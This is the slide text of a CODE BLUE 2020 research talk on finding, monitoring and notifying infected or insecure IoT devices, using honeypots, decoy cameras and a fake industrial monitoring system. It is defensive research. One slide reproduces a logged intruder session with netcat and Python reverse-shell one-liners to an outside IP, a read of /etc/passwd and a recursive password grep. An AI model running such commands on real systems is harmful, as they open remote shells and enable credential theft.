Tons of insecure IoT devices are out there and ready to be compromised to join next IoT botnet or misused in even more serious threats. Since many of them are unmanaged, the situation does not seem to improve naturally in a short term. This talk will focus on series of efforts on discovery, monitoring, analysis, and notification of these devices trying to clean up "the mess".

1. Cleaning up the mess:
Discovery, monitoring, analysis, and notification
of infected/insecure IoT devices
サイバーデブリをどう片づけるか？
～感染/脆弱IoT機器の発見、観測、分析、通知活動の今～
Katsunari Yoshioka
Yokohama National University
CODE BLUE 2020
1
This work is partially supported by two projects “WarpDrive: Web-based Attack Response with Practical and Deployable Research InitiatiVE” funded by NICT and
Research and Development for Expansion of Radio Wave Resources (JPJ000254) by MIC, Japan.

2. 2
Botnet & DDoS
Insecure Cameras
Exposed Facilities
Internet-of-things is
already full of mess...

3. IoT Cyber Threat Monitoring and Alerting System at YNU
Passive
monitoring
Active
Monitoring
Analysis/Alert/
Data Sharing
Internet of
Things
連携国・企業・大学等
連携国・企業・大学等
Other organizations
(Government, CERTs,
ISPs, Research Institutes,
Security Vendors)
Feedback
Alerts

4. EFFORT ONE:
OBSERVING AND CLEANING UP COMPROMISED DEVICES
4

5. IoT Cyber Threat Monitoring and Alerting System at YNU
Passive
monitoring
Active
Monitoring
Analysis/Alert/
Data Sharing
Internet of
Things
連携国・企業・大学等
連携国・企業・大学等
Other organizations
(Government, CERTs,
ISPs, Research Institutes,
Security Vendors)
Feedback
Alerts

6. Our system: IoTPOT = IoT Honeypot
6
We use decoy system (honeypot) to emulate vulnerable IoT devices to
monitor the attacks in depth
IoTPOT
Attacker’s
C2
Infected
devices
Capture
malware
Capture
malware
Sandbox
Analyze
behaviors
Analyze
behaviors
Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow, “IoTPOT:
Analysing the Rise of IoT Compromises,” USENIX WOOT 2015

7. 0
200000
400000
600000
800000
1000000
1200000
1400000
1600000
#IP
/MONTH
# of accessors # of attackers
1.3M
IPs/month
Mirai
Pandemic
Mirai
malware
Pandemic
Mirai pandemic in 2016

8. Mirai pandemic
• Attacks from
Over 200
countries/regions
• Especially Asian and South
American countries have
many infected devices

9. IoT DDoS
Infected devices
Cache DNS
at ISPs
9a3jk.cc.zmr666.com?
elirjk.cc.zmr666.com?
pujare.cc.zmr666.com?
oiu4an.cc.zmr666.com?
Auth DNS for
“zmr666.com”
9a3jk.cc.zmr666.com?
elirjk.cc.zmr666.com?
pujare.cc.zmr666.com?
oiu4an.cc.zmr666.com?
Slow
response
No resource
1Tbps+
attack!

10. 10
Size of attacks Arbor observed
Infected devices observed by IotPOT Matching period:
Aug1-22, 2016
100Gbps+
The attack events were provided by Arbor Networks ASERT Japan

11. Attacked ports observed by sandbox
analysis
Port # # samples Port # # samples Port # #samples
23/tcp 102 7574/tcp 1 9997/tcp 1
80/tcp 3 8080/tcp 6 37215/tcp 7
81/tcp 2 8081/tcp 3 37964/tcp 1
82/tcp 2 8090/tcp 1 49152/tcp 1
443/tcp 3 8181/tcp 2 52869/tcp 2
2323/tcp 14 8443/tcp 1
5555/tcp 4 9090/tcp 1
Recently captured 100+ samples attacked 19 different
ports (original Mirai attacked two to three)

12. IoT Cyber Threat Monitoring and Alerting System at YNU
Passive
monitoring
Active
Monitoring
Analysis/Alert/
Data Sharing
Internet of
Things
連携国・企業・大学等
連携国・企業・大学等
Other organizations
(Government, CERTs,
ISPs, Research Institutes,
Security Vendors)
Feedback
Alerts

13. Cleaning the infected “things”
13
Detect
attacks
Internet
Detect
attacks
Walled garden
At least one of your connected
devices has been infected by
Mirai malware and we have
moved you to protected network.
In order to gain full-access to
the Internet, please follow the
instructions below:
O. Cetin, C. Gañán, L. Altena, D. Inoue, T. Kasama, K. Tamiya, Y. Tie, K. Yoshioka, M. van Eeten, "Cleaning Up the
Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai," The Network and
Distributed System Security Symposium (NDSS 2019), 2019 (Distinguished Paper Award).

14. Notification Experiment

15. Does it work?
15

16. App-based notification project
16
Detected
attack!
Your device
is infected!
Wide scans
Telnet
detected
You have
telnet open!

17. The WarpDrive Project
17
Install “Tachikoma” App and be secure!
https://warpdrive-project.jp/

18. EFFORT TWO:
DISCOVERING INSECURE DEVICES
18

19. Monitoring, analysis, alert system at YNU
Passive
monitoring
Active
Monitoring
Analysis/Alert/
Data Sharing
Internet of
Things
連携国・企業・大学等
連携国・企業・大学等
Other organizations
(Government, CERTs,
ISPs, Universities,
Security Vendors)
Feedback
Alerts

20. Overview
 WebUIs of same/similar IoT devices are very similar
• We cluster WebUI images obtained by network
scanning
20
WebUI of the same/similar devices should
form large clusters
WebUI of the same/similar devices should
form large clusters

21. Experiment
• 14,744 image data from a certain Japanese AS
–Percentage of IoT WebUIs
※by manual inspection with random sampling
→35％
• We call a cluster “IoT cluster” if it contains 50% or
more IoT devices of the same/similar categories
21

22. Filtering noises
• Filtering for the following 3 kinds of
clusters
–Error message pages
–Blank pages
–Server test/default pages
22

23. Initial clustering results
23
 Showing all the clusters
include singletons
 A circle represents a cluster
IoT cluster
NOT IoT cluster

24. Clustering result
24
IoT cluster
NOT IoT cluster
Error message page cluster
 Many “error message page” exist,
and form large clusters
→Exclude

25. Clustering result
25
 Many “blank page ” exist,
and form a large cluster
→Exclude
IoT cluster
NOT IoT cluster
Blank page cluster

26. Clustering result
26
 Many “server test/default page ”
exist, and form large clusters
→Exclude
IoT cluster
NOT IoT cluster
Server test/default page cluster

27. Filtering particular clusters
27
 Result after excluding
“server test/default page cluster”
 Because 88% of singletons are
common web sites ※,
we also exclude them
（※confirmed by random sampling）
高濃度IoTクラスタ
非IoTクラスタ
IoT cluster
NOT IoT cluster

28. Clustering result
28
By excluding the following clusters, it
was found that the WebUI images of
the IoT devices form larger clusters
than common Web pages
 Error message page cluster
 Blank page cluster
 Server test/default page cluster
 Singletons
高濃度IoTクラスタ
非IoTクラスタ
IoT cluster
NOT IoT cluster

29. Device category
29
IP camera
Router
NAS
NVR
Remote monitoring
DVR
ICS
Copier
Security appliance
Other

30. Discovered IoT devices
• We found 154 models of IoT devices in single AS
30
8.4%
9.7%
11.0%
14.3%
40.9%
3.9%
3.9%
1.3%
1.3%
5.2%
IP camera
Router
NAS
NVR
Remote monitoring
DVR
ICS
Copier
Security appliance
Other
IP
Cameras!
IP
Cameras!

31. EFFORT TRHEE:
UNDERSTANDING THE RISK OF
INSECURE/EXPOSED CAMERAS
31

32. Monitoring, analysis, alert system at YNU
Passive
monitoring
Active
Monitoring
Analysis/Alert/
Data Sharing
Internet of
Things
連携国・企業・大学等
連携国・企業・大学等
Other organizations
(Government, CERTs,
ISPs, Universities,
Security Vendors)
Feedback
Alerts

33. Experiment of decoy IP camera
exposing bait URL and ID/password
Decoy IP Camera exposing bait
credential
Peeping observation experiment with two kinds of
decoy IP Cameras
monitoring a room for observation imitating
a living room at home
33
Decoy IP Camera monitoring “living
room”

34. Sharp increase in
the number of
hosts
Sharp increase in
the number of
hosts
Access to honey camera
34
Number of hosts that access the honey camera
Camera A
Camera B

35. • Massive requests via insecam were observed
• Honey camera was registered to insecam
The honey camera was on Insecam…
GET /xxxxxxx/xxxxx?resolution=640&quality=1&
Language=0&COUNTER HTTP/1.1
Referer: http://www.insecam.org/en/bycountry/JP/?page=4
Peeps jumped to more than 20,000 times per day
after the registration to Insecam 35

36. Do they actually use credentials?
1. Peeping
2. Access URL
3. Enter ID / Password
36

37. Access to the URL with bait credentials
• Observed access to the bait URL from 422 IP
addresses
• 217 IP address entered ID / password displayed on
camera A
Host that sent
the request
Acess host using domain
of URL
Login challenge
host
Host that entered
ID/password displayed on
camera A
583 422 235 217
Humans are watching images of cameras
Some peepers go “beyond peeping” (login challenge)
37

38. The “living room”
We prepared a room that looks like a living room and
observed peeping behaviors.
38

39. • Several accessors keep peeping for days..
The long peep
39
Date and time Duration IP address
2017-10-08_12-54-28 9:58 182.251.255.4
2017-10-08_13-04-28 0:10~1:47 182.251.255.4
2017-10-08_20-54-50 4:08~9:45 182.251.255.7
2017-10-08_21-04-50 0:14~1:35 182.251.255.7
2017-10-08_21-14-50 8:39 182.251.255.7
2017-10-08_21-24-50 0:10~1:40 182.251.255.7
2017-10-08_23-44-57 2:13~2:40 106.159.126.87
2017-10-09_01-25-03 1:22~1:45 106.159.126.87
2017-10-09_01-55-04 4:38 106.159.126.87
2017-10-09_04-25-10 1:06~1:44 106.159.126.87
2017-10-09_07-55-21 2:45~4:25 106.159.126.87
2017-10-09_11-35-47 7:23~8:08 106.159.126.87
2017-10-09_12-34-54 9:06 106.159.126.87
2017-10-09_19-36-11 5:23~5:35 182.251.255.16
Frequent
IP
changes
due to
mobile
access

40. Access to honey camera
Host that sent the
request
Login host Peeping host Changing angles
Zoom in/out
A 1755 33
8
C 1998 66
18
D 1806 13
1
E 1749 4
F 876 51 32
6
40

41. Changing angles/zooming in out
41

42. Automated discovery and image
acquisition for multiple cameras
GET /cgi-bin/xxxxx?resolution=640&
quality=1&Language=0&COUNTER
GET /xxxxJPG?COUNTER
GET /cgi-bin/xxxxxxx.cgi?chn=0&
u=admin&p=&q=0&COUNTER
GET /mjpg/xxxxxx.mjpg?COUNTER
GET /xxxxxxxximage1?COUNTER
We observed automated requests collecting
images from multiple IP cameras
A request to acquire an image
of IP camera A
A request to acquire an image
of an IP camera of others
model
A request to acquire an image
of IP camera E
42

43. Continuous and “efficient” peeping
10/14 01:13:40
10/17 00:44:08
10/14 01:15:16
1m36s
52s
10/14 01:16:08
3m17s
10/14 01:19:25
14s
10/14 01:19:39
1. Automated search for cameras
GET /xxxxxx.cgi?user=yyyy&pwd=yyyyy
2. Automated search for cameras
GET /cgi-bin/xxxxxx
3. Manual peep using browser (access by human)
GET /cgi-bin/xxxx?resolution=1280x960&quality=1
&page=yyy&Language=z
4. Image acquisition of camera A using tool
GET /xxxxxxxxJPEG , GET /cgi-bin/xxxxxx
5. Continuous and automated acquisition of images
GET /cgi-bin/xxxxxx?fake=yyyy
42h Combination of automated accesses by camera
scanner and auto image capture and manual
browsers access (by human) are observed 43

44. Peeping with vulnerability
exploitation(Camera F)
• Camera F vulnerability
–ID / password can be acquired without authentication by specific request
• Observed access flow(4 IP address)
1.Get ID / password illegally
2. Peep with the acquired ID/password
44
We informed these results to multiple camera vendors

45. EFFORT FOUR:
UNDERSTANDING THE RISK OF
INSECURE/EXPOSED FACILITIES
45

46. Discovered IoT devices
• We found 154 models of IoT devices in single AS
46
8.4%
9.7%
11.0%
14.3%
40.9%
3.9%
3.9%
1.3%
1.3%
5.2%
IP camera
Rouer
NAS
NVR
Remote monitoring
DVR
ICS
Copier
Security appliance
Other

47. Waterworks Monitoring System
Case:

48. River Gate
Example Case:

49. Raspberry Pi
Telnet service
(simulation)
Raspberry Pi
Internal network
(simulation)
PC
（Access controller）
switch
Reverse
proxy
80/tcp
iptables
502/tcp
Data logger specific port
PLC specific port
Data logger PLC
Internet
23/tcp
Telnet
proxy
Honeypot of remote monitoring system
• We build the honeypot using real PLC and data logger
49

50. WebUI –Facility name/Current time
50
Fictitious facility name
(Japanese and English)
Manufacturer
name
Manufacturer
name
Image of Data logger
Model number of Data logger

51. WebUI – Log of Sensor Data
51
Maker
name
Maker
name
Fictitious facility name
(Japanese and English)
Fictitious facility name
(Japanese and English)
Manufacturer
name

52. WebUI –ON/OFF buttons
52
The confirmation dialog is displayed
when the control button is pushed
Fictitious facility name
(Japanese and English)
Manufacturer
name

53. WebUI –Modifying Values
53
When the button is pushed, the input form is
displayed and accessors can enter the setting
value
Fictitious facility name
(Japanese and English)
Manufacturer
name

54. Access to honeypot WebUI(manual)
54
Number of accessors
New Comer
Repeater
Observation start date
First manual accessor after
12 hours from observation
start
Since it was behaving lie a full-browser, it was
erroneously determined as manual access
September October November

55. Duration of each manual access on
webUI
Workshop in Hakone 55
Duration（days）
1 1 1 1
2
121
Number of accessors
Persistent
accesses

56. Critical control operations on webUI
Workshop in Hakone 56
Number of accessors
115
3
1
4
1
2
Time of control operations
Aggressive
remote
operation

57. Source of manual accesses
57
Ukraine
３件の
Tor Exit-node
３
Tor
Exit-nodes
18
11
10
US
Brazil
UK
Spain
Germany
Japan
Russia
Canada
China

58. “Careful” visitor
9/28
（Total:32m6s）
• Access 3 honeypots
(A,B,C)
• Do page transitions
in A,B、Browse only
top page in C
10/01
(Total:2h)
There is a blank time
• Access 3 honeypots
(A,B,C)
• Browse only Top
page in B,C、Do page
transitions in A
58
10/24
（Total:41m）
• Access 2
honeypots (A,C)
• Do page
transitions in both
honeypots
11/23
(Total:17h)
There is a blank time
• Access 1 honeypot
(A)
• Browse Top page.
After 15 hours, do
page transitions
- Use 3 IP addresses
- Do not perform control operations
- A minimum page transitions

59. “Aggressive” visitor
01:23:27
• Browse Top page
01:33:48
• Browse setting value change page
01:34:23
01:34:33
• Change a set value（Lightning power：
98.000→20.000）
01:35:43
• Change a set value（Air-conditioning
power：100.000→50.000）
01:36:11
• Browse ON/OFF page
59
01:36:35
• Lightning power：OFF→OFF
01:36:52
• Air-conditioning power：
OFF→ON
01:37:09
• PLC：OFF→ON
01:37:27
• Browse reset buttons page
and setting value change page
02:06:48
• Change a set value（Lightning
power：98.000→95.000）
- Use 1 IP address
- Some critical operations

60. “Rich” visitor
60
00:04:01
• TOP page
00:04:30
• Browse event page
00:04:56
~
01:58:27
• Access 1 honeypot using the Web
application security scanner tool (It is
a professional tool that costs annual
charge of 5000~8000USD）
We informed about these observation to MIC

61. Do the web contents of critical infra
attract visitors?
#visitors
per IP per
Day
Average #
commands
Average
duration of
visit [s]
Remote monitoring
WebUI with Facility
name and Device image
0.112 6.01 400
Remote monitoring
WebUI with Device
image but no facility
name
0.025 2.08 134
Remote monitoring
WebUI with no device
image and no facility
name
0.049 3.04 178
Simple Login Page 0.015 N/A 5.4

62. Post on hacking forum attracts
attackers and security experts
62
Date Event
2018/08/31 Launch of honeypot
2019/12/08 New thread on the honeypot facility in hacking forum
2019/12/09
# Attacks jumps up (login challenges increased)
Notification from security vendor
2019/12/10 Notification from anonymous expert
2019/12/17 Notification from JPCERT/CC
# visitors

63. Observing deeper
intrusion
63

64. Observing deeper intrusion
64
Honeypot Web UI
(intentionally) exposes
admin credentials (which
happens in the wild.)
tel login:
Login by using admin credentials
obtained from WebUI
Li9-admin
Password: 3k54*2?r
adm@li9% ifconfig
eth0 Link encap…
eth1 Link encap..
Access WebUI
lateral movement
Admin Telnet
User: Li9-admin
Pass: 3k54*2?r

65. An example of deep intruder
mg@li8~ $ ls -al
mg@li8~ $ cd .ssh
mg@li8~/.ssh $ ls -al
mg@li8~/.ssh $ nc xx.xx.231.63 7414 -e /bin/bash
mg@li8~/.ssh $ python -c 'import pty;
pty.spawn("/bin/bash")'
mg@li8~/.ssh $
mg@li8~/.ssh $ ls
mg@li8~/.ssh $ cd ..
mg@li8~ $ sudo -l
mg@li8~ $ pwd
mg@li8~ $ ls -al
mg@li8~ $ cat list.txt
mg@li8~ $
mg@li8~ $ uname -a
mg@li8~ $ cat /etc/passwd
mg@li8~ $ id
mg@li8~ $
mg@li8~ $
mg@li8~ $ cat list.txt
mg@li8~ $ ls -al
mg@li8~ $ cd manual
mg@li8~/manual $ ls -al
mg@li8~/manual $ cd /var
mg@li8/var $ ls -al
mg@li8/var $ cd backups
mg@li8/var/backups $ ls -al
mg@li8/var/backups $ cd ..
mg@li8/var $ ls -al
mg@li8/var $ ls -al
mg@li8/var $ file sqp
mg@li8/var $ file swap
mg@li8/var $ cd ..
mg@li8/ $ ls -al
mg@li8/ $ cd home
mg@li8/home $ ls -al
mg@li8/home $ cd dl8
mg@li8/home/dl8 $ ls -al
mg@li8/home/dl8 $ cd Desktop
mg@li8/home/dl8/Desktop $ ls -al
mg@li8/home/dl8/Desktop $ cd ..
mg@li8/home/dl8 $ cd Documents
mg@li8/home/dl8/Documents $ ls -al
mg@li8/home/dl8/Documents $ cd ..
mg@li8/home/dl8 $
mg@li8/home/dl8 $ cd Download
mg@li8/home/dl8 $ cd Downloads
mg@li8/home/dl8/Downloads $ ls -al
mg@li8/home/dl8/Downloads $ cd ..
mg@li8/home/dl8 $ cd oldconffiles
mg@li8/home/dl8/oldconffiles $ ls -al
mg@li8/home/dl8/oldconffiles $ cd .config
mg@li8/home/dl8/oldconffiles/.config $ ls -a
mg@li8/home/dl8/oldconffiles/.config $ cat Trolltech.conf
mg@li8/home/dl8/oldconffiles/.config $ ls -al
mg@li8/home/dl8/oldconffiles/.config $ cd openbox
mg@li8/home/dl8/oldconffiles/.config/openbox $ ls -al
mg@li8/home/dl8/oldconffiles/.config/openbox $ cd ..
mg@li8/home/dl8/oldconffiles/.config $ cd pcmanfm
mg@li8/home/dl8/oldconffiles/.config/pcmanfm $ ls -al
mg@li8/home/dl8/oldconffiles/.config/pcmanfm $ cd ..
mg@li8/home/dl8/oldconffiles/.config $ cd ..
mg@li8/home/dl8/oldconffiles $ ls -al
mg@li8/home/dl8/oldconffiles $ cd .themes
mg@li8/home/dl8/oldconffiles/.themes $ ls -al
mg@li8/home/dl8/oldconffiles/.themes $ cd PiX
mg@li8/home/dl8/oldconffiles/.themes/PiX $ ls -al
mg@li8/home/dl8/oldconffiles/.themes/PiX $ cd ..
mg@li8/home/dl8/oldconffiles/.themes $ cd ..
mg@li8/home/dl8/oldconffiles $ ls -al
mg@li8/home/dl8/oldconffiles $ cd ..
mg@li8/home/dl8 $ ls -al
mg@li8/home/dl8 $ cd Videos
mg@li8/home/dl8/Videos $ ls -al
mg@li8/home/dl8/Videos $ cd ..
mg@li8/home/dl8 $ ls -al
mg@li8/home/dl8 $ cd python_games
mg@li8/home/dl8/python_games $ ls -al
mg@li8/home/dl8/python_games $ cd ..
mg@li8/home/dl8 $ cd pcap
mg@li8/home/dl8/pcap $ ls -al
mg@li8/home/dl8/pcap $
mg@li8/home/dl8/pcap $ ip a
mg@li8/home/dl8/pcap $ ./run_tcpdump.sh
mg@li8/home/dl8/pcap $ grep -rnw '/' -ie
'password' --color=always
mg@li8~ $ id
mg@li8~ $ su dl8
mg@li8~ $ su dl8
mg@li8~ $ ls -al
mg@li8/var/mail $ cd ..
mg@li8/var $ ls -al
mg@li8/var $ cd opt
mg@li8/var/opt $ ls -al
mg@li8/var/opt $ cd ..
mg@li8/var $ cd log
mg@li8/var/log $ ls -al
mg@li8/var/log $ id
mg@li8/var/log $ ps aux
mg@li8/var/log $ cd ..
mg@li8/var $ ls -al
mg@li8/var $ cd ..
mg@li8/ $ ls -al
mg@li8/ $ cd bin
mg@li8/bin $ ls -al
mg@li8/bin $ netstat
mg@li8/bin $ netsat -plnt
mg@li8/bin $ netsat -plnt
mg@li8~ $ <pre>python -c &apos;import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect((&quot;75.39.231.63&fileno(),1);
os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-
i&quot;]);&apos;</pre>
mg@li8~ $ python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STR
EAM);s.connect(("75.39.231.63",7414));os.dup2(s.fileno(),2);p=subpro
cess.call(["/bin/sh","-i"]);'
mg@li8~ $ ls -al
mg@li8~ $
mg@li8~ $ cd manual
mg@li8~/manual $ ls -al
mg@li8~/manual $ cd ..
mg@li8~ $ ls -al
mg@li8~ $ cd ..
mg@li8/home $ cd ..sh
mg@li8/home $ cd ..
mg@li8/ $ ls -al
mg@li8/ $ cd root
mg@li8/ $ cd etc
mg@li8/etc $ ls -al
mg@li8/etc $
mg@li8/etc $ ps aux
mg@li8/etc $
mg@li8/etc $ netstat -plnt
mg@li8/etc $ netstat
mg@li8/etc $
mg@li8/etc $ cd ssh
mg@li8/etc/ssh $ ls -al
mg@li8/etc/ssh $ cat ssh_config
mg@li8/etc/ssh $ cat sshd_config
mg@li8/etc/ssh $ nc
mg@li8/etc/ssh $ nc 75.
mg@li8/etc/ssh $ nc xx.xx.63 741
mg@li8/etc/ssh $
mg@li8/etc/ssh $
mg@li8/etc/ssh $ cd /
mg@li8/ $ ls -al
• Sent 10 times as many commands as ordinally
human visitors to telnet honeypot, implying strong
interest on the system.
• Checks for the device and network configurations,
tried several privilege escalation and tool downloads
• Fast typing and decision making, use of one-line
commands implying relatively high skill in Linux
system
• Checking device operators command history,
accessing document files (operators note for plants
network topology).

66. 66
Investigation by the government (2017)
Ministry of Internal Affairs and
Communications / ICT-ISAC /
Yokohama National University
System
Owners
Operators
System Integrators
Investigators
Device
Manufacturers
1. Scan for
insecure IIoT
systems and
identify
manufacturers
and owners
2. Notify manufacturers
and owners
3. Notify system
integrators and fix
related systems

67. Summary of investigation results (published by
MIC)
• Discovered vulnerable devices: 150
• Device users can be inferred：77
• Notified and fixed：36
• We could not find any of these information on
Shodan/Censys because:
– Ports not scanned
– Redirects/JavaScript not handled
– multi-byte characters (Japanese) not supported
67
New notification project just launched from Aug 2020. ML-assisted
investigation would enable efficient discovery of insecure devices

68. • People are not yet aware of the risk of connecting
“things” to the world and thus creating the big
“mess”.
• Combination of active and passive monitoring
helps understanding the critical situation.
• The government/ISP/researchers put much
efforts on notifying the users of infected/insecure
devices to clean up the mess.
Summary
68

69. Thank you!
Katsunari Yoshioka, Ph.D
Yokohama National University
yoshioka@ynu.ac.jp
For more, please visit:
IoTPOT – Analysing the Rise of IoT Compromises, Yokohama National University
http://ipsr.ynu.ac.jp/iot/
References:
Rui Tanabe, Tatsuya Tamai, Akira Fujita, Ryoichi Isawa, Katsunari Yoshioka, Tsutomu Matsumoto, Carlos Ganan
and Michel Van Eeten, "Disposable Botnets: Examining the Anatomy of IoT Botnet Infrastructure," Proc.
International Conference on Availability, Reliability, and Security (ARES2020), 2020.
O. Cetin, C. Ganan, L. Altena, D. Inoue, T. Kasama, K. Tamiya, Y. Tie, K. Yoshioka, M. van Eeten, "Cleaning Up
the Internet of Evil Things: Real-World Evidence on ISP and Consumer Efforts to Remove Mirai," The Network
and Distributed System Security Symposium (NDSS 2019), 2019.
Yin Minn Pa Pa, Suzuki Shogo, Katsunari Yoshioka, Tsutomu Matsumoto, Takahiro Kasama, Christian Rossow
"IoTPOT: A Novel Honeypot for Revealing Current IoT Threats," Journal of Information Processing, Vol. 57, No.
4, 2016.
Yin Minn Pa Pa, Shogo Suzuki, Katsunari Yoshioka, and Tsutomu Matsumoto, Takahiro Kasama, Christian
Rossow, "IoTPOT: Analysing the Rise of IoT Compromises," 9th USENIX Workshop on Offensive Technologies
(USENIX WOOT 2015), 2015.
69